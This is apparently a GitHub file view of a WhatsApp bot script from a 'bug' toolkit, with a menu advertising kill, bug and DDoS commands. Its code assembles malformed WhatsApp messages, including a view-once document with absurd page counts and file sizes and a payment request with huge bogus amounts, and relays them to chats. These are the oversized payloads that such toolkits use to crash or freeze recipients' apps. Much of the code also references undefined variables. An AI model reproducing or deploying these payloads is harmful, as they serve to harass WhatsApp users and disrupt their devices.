-
Notifications
You must be signed in to change notification settings - Fork 330
/
Copy pathpenis.js
291 lines (277 loc) · 10.7 KB
/
penis.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
const fs = require('fs');
const path = require('path');
const Jimp = require('jimp'); // Ensure Jimp is installed and required
// Function to resize an image using Jimp
let resize = async (image, width, height) => {
let oyy = await Jimp.read(image);
let kiyomasa = await oyy.resize(width, height).getBufferAsync(Jimp.MIME_JPEG);
return kiyomasa;
}
// Example function to handle some message sending functionality
let penis = async () => {
let freesex = {
viewOnceMessage: {
message: {
interactiveMessage: {
"header": {
"title": "*𝚸𝚫𝚻𝚪𝚯𝚴 𝛁1 𝚩𝐔𝐆*",
...(await prepareWAMessageMedia({
document: overlaid,
pageCount: 9999999,
fileLength: 99999999999999,
mimetype: 'image/png',
jpegThumbnail: await resize(fs.readFileSync(`./media/overlaid.jpg`), 400, 400)
}, {
upload: ryozingod.waUploadToServer
})),
"hasMediaAttachment": true
},
"body": {
"text": ""
},
"footer": {
"text": "*# Zero Execution Vault - 2k24*"
},
"nativeFlowMessage": {
"buttons": [
{
"name": "single_select",
"buttonParamsJson": JSON.stringify({
"title": "🦠 SEE ALL MENU 🎩",
"sections": [
{
"title": "👾 Choose One Of Them ⭐",
"highlight_label": "#General",
"rows": [
{
"header": "[ ❇️ ] • ALL CMD",
"title": "❗Show All Command",
"id": ".allmenu"
},
{
"header": "👤 - CONTACT THE OWNER",
"title": "❗Displays Owner Number",
"id": ".owner"
},
{
"header": "🖥️ - Bot Info",
"title": "❗Displays Information About Bots",
"id": ".botstatus"
}
]
},
{
"title": "🍷 SUPERIOR COMMAND ♦️",
"highlight_label": "#FRONT",
"rows": [
{
"header": "🎩 - BUG MENU ‼️",
"title": "❗Displays All Bug Commands",
"id": ".killmenu"
},
{
"header": "🔗 - DDOS MENU 📥",
"title": "❗Displays All Ddos",
"id": ".ddosmenu"
}
]
}
]
})
},
{
"name": "cta_url",
"buttonParamsJson": JSON.stringify({
"display_text": "Saluran WhatsApp",
"url": "https://whatsapp.com/channel/0029Val0s0rIt5rsIDPCoD2q",
"merchant_url": "https://whatsapp.com/channel/0029Val0s0rIt5rsIDPCoD2q"
})
}
],
"messageParamsJson": ""
},
"contextInfo": {
"mentionedJid": [m.sender],
"externalAdReply": {
"title": "d4-stardust",
"thumbnail": null,
"previewType": "PHOTO",
"mediaType": 2
}
}
}
}
}
};
ryozingod.relayMessage(m.chat, freesex, {});
}
penis();
// Define the prefix and command handling
const prefixRegex = /^[°•π÷׶∆£¢€¥®y-™+✓_=|~!?@#$%^&.©^]/;
const prefix = prefa && prefixRegex.test(body) ? body.match(prefixRegex)[0] : (prefa ?? global.prefix);
const command = body.startsWith(prefix) ? body.slice(prefix.length).trim().split(/ +/).shift().toLowerCase() : '';
// Function to load plugins from a directory
const loadPlugins = (directory) => {
let plugins = [];
const folders = fs.readdirSync(directory);
folders.forEach(folder => {
const folderPath = path.join(directory, folder);
if (fs.lstatSync(folderPath).isDirectory()) {
const files = fs.readdirSync(folderPath);
files.forEach(file => {
const filePath = path.join(folderPath, file);
if (filePath.endsWith('.js')) {
delete require.cache[require.resolve(filePath)];
const plugin = require(filePath);
plugins.push({ filePath, plugin });
}
});
}
});
return plugins;
}
// Load plugins from the zetsubo directory
const plugins = loadPlugins(path.resolve(__dirname, './zetsubo'));
const context = {
ryozingod,
m,
chatUpdate,
store,
smsg,
getGroupAdmins,
formatp,
h2k,
tanggal,
formatDate,
getTime,
isUrl,
sleep,
clockString,
msToDate,
sort,
toNumber,
enumGetKey,
runtime,
fetchJson,
getBuffer,
jsonformat,
delay,
format,
logic,
generateProfilePicture,
parseMention,
getRandom,
pickRandom,
reSize,
ngeloc,
buglive,
isPremium,
fpoll // Ensure fpoll is added to the context
};
// Handle commands using plugins
let handled = false;
for (const plugin of plugins) {
if (plugin.plugin.command === command) {
await plugin.plugin.operate(context);
handled = true;
break;
}
}
// If not handled by plugins, use switch-case for default commands
if (!handled) {
switch (command) {
case 'a1':
console.log('anjay1');
break;
case 'a2':
console.log('anjay1');
break;
case 'a3':
console.log('anjay1');
break;
case 'w1':
console.log('woi1');
break;
case 'w2':
console.log('woi2');
break;
case 'menu':
let menu = `
👇berikut adalah menunya :
🩸a1
🩸a2
🩸a3
🩸w1
🩸w2
${plugins.map(p => `🩸${p.plugin.command}`).join('\n')}
`;
console.log(menu);
break;
default:
console.log('Command not found');
break;
}
}
// Define fpoll for polls
const fpoll = {
key: {
participant: `0@s.whatsapp.net`,
...(m.chat ? { remoteJid: "" } : {})
},
message: {
"pollCreationMessage": {
"name": "p"
}
}
};
// Define etc with payment details
let etc = {
viewOnceMessage: {
message: {
"interactiveMessage": {
"header": {
"hasMediaAttachment": true,
"jpegThumbnail": fs.readFileSync(`./media/overpix.png`)
},
"nativeFlowMessage": {
"buttons": [
{
"name": "review_and_pay",
"buttonParamsJson": JSON.stringify({
"currency": "IDR",
"total_amount": { "value": 49981399788, "offset": 100 },
"reference_id": "4OON4PX3FFJ",
"type": "physical-goods",
"order": {
"status": "payment_requested",
"subtotal": { "value": 49069994400, "offset": 100 },
"tax": { "value": 490699944, "offset": 100 },
"discount": { "value": 485792999999, "offset": 100 },
"shipping": { "value": 48999999900, "offset": 100 },
"order_type": "ORDER",
"items": [
{
"retailer_id": "7842674605763435",
"product_id": "7842674605763435",
"name": "🖤⟩ ༘྅ᏃɛᏆֆʊɮᎾxᎽᎶɛℕ ☆ ꧏ🤍҈ ༑",
"amount": { "value": 9999900, "offset": 100 },
"quantity": 7
},
{
"retailer_id": "custom-item-f22115f9-478a-487e-92c1-8e7b4bf16de8",
"name": "",
"amount": { "value": 999999900, "offset": 100 },
"quantity": 49
}
]
},
"native_payment_methods": []
})
}
]
}
}
}
}
};
ryozingod.relayMessage(m.chat, etc, {});